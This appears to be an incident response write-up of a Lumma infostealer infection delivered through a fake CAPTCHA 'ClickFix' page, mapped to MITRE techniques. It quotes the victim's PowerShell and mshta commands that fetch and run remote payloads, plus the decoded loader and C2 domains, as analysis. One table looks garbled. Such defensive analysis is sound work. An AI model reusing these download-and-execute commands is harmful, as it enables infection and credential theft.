Tldr;
This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team in May 2025 involving the infostealer LUMMA.
Below provides a summary of findings which are presented in this blog post:
- Initial access via a drive by compromise
- Leveraging PowerShell to execute commands and download files
- Targeting Microsoft Edge and Google Chrome data
Overview
Lumma C2 Stealer is a variant of information stealer malware, first sighted in December 2022. It’s usually sold by a Russian-speaking Threat Actor, as a Malware as a Service offering.
A characteristic of infostealers is theft of sensitive data such as credentials, browser data and cryptocurrency. In this case, LUMMA was seen targeting browser data, specifically the data stores Login Data and Web Data for Microsoft Edge and Google Chrome.
Since its birth, LUMMA has utilised various tactics and techniques. In this incident, one host was impacted after the user was directed to a fake CAPTCHA verification page – one of the newer techniques observed in LUMMA campaigns.
Timeline
T + 0 minutes – Visited the fake CAPTCHA site
T + 1 minute – PowerShell execution and malicious file creation
T + 2 minutes – C2 connection and credential access activity
T + 7 minutes – Discovery activity
MITRE Techniques
Initial Access
T1189 – Drive-by Compromise The affected user visited the legitimate hxxps://astapowerproject[.]net/ however this visit led to 12 attempts to visit malicious sites – these were blocked. The hxxp://astapowerproject[.]net/ site was visited. Every time the page was refreshed, the related searches would change. Example searches can be seen in the screenshot below.

Each URL was wrapped in a googleadservices[.]com link.
Subsequent visits were then made to the below malicious CAPTCHA sites in the following order:
- 871549.eliteeyeview[.]co (…Loading.. and reCAPTCHA V3 Security pages)
- myvantage.getitquickly[.]biz (reCAPTCHA V3 Security page)
- 657.s3.fr-par.scw[.]cloud (reCAPTCHA V3 Security page)
At the time of the investigation, the myvantage.getitquickly[.]biz URL when visited would redirect to the third URL which was inaccessible, as seen below.

The 657.s3.fr-par.scw[.]cloud domain suggests the resource was hosted on Scaleway, a European cloud provider, rather than AWS. The use of s3 indicates that object storage is used. fr-par refers to the region in this case France, Paris. scw.cloud is the domain for Scaleway.
Execution
T1204 – User Execution The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload. This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard. At the time of detection, the URL was uploaded to the Any.Run sandbox and as seen below, the user would have been presented with a fake CAPTCHA page.

The below verification steps would appear to the user:
- Press Windows Button and R
- Press CTRL + V
- Press Enter
The Microsoft.Windows .Shell.RunDialog was opened and used to execute the PowerShell command: powershell -w hidden -nop -c $a='https://2n';$b='o.co/2OArm3';iex(irm ($a+$b)).
T1059.001 – Command and Scripting Interpreter: PowerShell
In addition to the PowerShell command executed in a hidden window, another PowerShell which was heavily obfuscated was executed.
The decoded command was:
iexhxxps://pub-24086c859ed94d628b911deba63401ab.r2[.]dev/
afc.zip$zip="$env:TEMP\afc.zip";
$dest=Join-Path $env:TEMP ("afc_" + [guid]::NewGuid()); Expand-
Archive -Path $zip -DestinationPath $dest; Start-Process -FilePath
(Join-Path $dest "AF1.exe");
$curl_command = $env:Temp;function wFPvdCjBn($iFuLaZNIo, $AFAeOI)
{curl $iFuLaZNIo -o $AFAeOI};function OlxYsax($GIHRSiO){wFPvdCjBn
$GIHRSiO $AFAeOI}$AFAeOI = $env:Temp + '\afc.zip';OlxYsax
$CPSr.SubString(3,59);
Expand-Archive -Path $AFAeOI -DestinationPath $curl_command;Add-Type
-Assembly System.IO.Compression.FileSystem;$JYcciN =
[IO.Compression.ZipFile]::OpenRead($AFAeOI);$RNofm =($JYcciN.Entries
| Sort-Object Name | Select-Object -First 1).Name;$mBSw = Join-Path
$env:Temp $RNofm;start $mBSw ;;
A breakdown of this command is:
- iex: Invoke-Expression executes a string as code. It downloaded the afc.zip from the iexhxxps://pub-24086c859ed94d628b911deba63401ab.r2[.]dev URL.
- $zip="$env:TEMP\<zip file name> sets a variable $zip to a path in the temporary folder. In this case, the malicious zip was created in C:\Users\<USER>\AppData\Local\Temp\afc.zip.
The afc.zip file contained the below files:
| Command | Description |
|---|---|
| findstr pfirewall.log | html for adding code snips |
| netsh advfirewall show currentprofile | Display the current active firewall profile settings for the Windows Defender Firewall. |
The above files except AF1.exe were also created in C:\ProgramData\unr.
T1059.010 – Command and Scripting Interpreter: AutoHotKey & AutoIT
The C:\Users\<USER>\AppData\Roaming\deci.com file was created at the same time as the afc.zip. This application was found to be AutoIt v3 Script (Beta) which is a scripting language used for creating automation scripts.
Defence Evasion
T1027 – Obfuscated Files or Information The PowerShell command to retrieve afc.zip was heavily obfuscated.
T1218.005 – System Binary Proxy Execution: Mshta Once the Run dialog was opened, a mshta.exe process was created, running the "mshta.exe" hxxps://2no[.]co/2Od3Q3 =-+2346823 command.
This command uses mshta.exe to fetch and execute a HTA file from a remote URL. A successful connection was made to the 2no[.]co domain.
Credential Access
T1555.003 – Credentials from Password Stores: Credentials from Web Browsers The AutoIt executable deci.com accessed the data stores Login Data and Web Data for both Microsoft Edge and Google Chrome browsers. Their file locations are:
- C:\Users\<USER>\AppData\Local\Microsoft\Edge\User Data\Default
- C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default
Discovery
T1518.001 – Software Discovery: Security Software Discovery The following commands were run at the time the host was compromised.
| Command | Description |
|---|---|
| findstr pfirewall.log | findstr is a command-line utility used to search for specific strings of text within files. In this case, the string pfirewall.log is searched for. |
| netsh advfirewall show currentprofile | Display the current active firewall profile settings for the Windows Defender Firewall. |
Command and Control
T1071.001 – Application Layer Protocol: Web Protocols The malicious executable AF1.exe initiated an outbound connection to the C2 blameaowi[.]run over HTTPS.